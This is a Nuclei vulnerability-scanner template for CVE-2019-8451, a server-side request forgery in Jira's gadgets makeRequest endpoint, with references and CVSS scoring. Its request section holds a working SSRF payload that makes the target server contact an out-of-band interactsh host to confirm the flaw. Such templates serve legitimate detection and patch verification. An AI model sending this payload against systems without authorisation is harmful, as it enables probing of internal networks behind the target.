nuclei-templates/cves/2019/CVE-2019-8451.yaml

37 lines
1.2 KiB
YAML

id: CVE-2019-8451
info:
name: JIRA SSRF in the /plugins/servlet/gadgets/makeRequest resource
author: TechbrunchFR
severity: medium
description: The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability
due to a logic bug in the JiraWhitelist class.
reference:
- https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
- https://jira.atlassian.com/browse/JRASERVER-69793
- https://hackerone.com/reports/713900
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2019-8451
cwe-id: CWE-918
tags: cve,cve2019,atlassian,jira,ssrf,oast
requests:
- method: POST
path:
- '{{BaseURL}}/plugins/servlet/gadgets/makeRequest'
body: |
url=https://{{Host}}:443@{{interactsh-url}}
headers:
X-Atlassian-Token: no-check
Content-Type: application/x-www-form-urlencoded
matchers:
- type: word
part: interactsh_protocol
words:
- "http" # Confirms the HTTP Interaction